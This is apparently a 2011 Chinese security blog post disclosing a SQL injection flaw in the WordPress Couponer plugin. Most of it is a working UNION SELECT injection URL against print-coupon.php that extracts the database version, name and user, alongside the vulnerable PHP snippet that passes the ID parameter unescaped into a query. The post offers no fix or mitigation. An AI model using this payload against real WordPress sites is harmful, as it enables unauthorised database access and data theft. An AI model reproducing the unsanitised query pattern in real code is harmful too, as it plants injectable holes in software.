WordPress的Couponer插件

http://www.xxxx.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION ALL SELECT 1,version(),database(),current_user(),5,6,7,8,9,10--%20

---------------
Vulnerable code
---------------
$ID = $_GET['ID'];
...
$sql_get_coupon_id = "SELECT *, DATE_FORMAT(Expires, '%b %e, %Y') as Expires, DATE_FORMAT(Created, '%b %e, %Y') as Created FROM wp_couponer WHERE ID='$ID'";
$result_get_coupon_id = mysql_query($sql_get_coupon_id);

本文固定链接: https://www.unhonker.com/bug/169.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年09月01日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress的Couponer插件 | 90' s Blog|关注网络信息安全

WordPress的Couponer插件:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!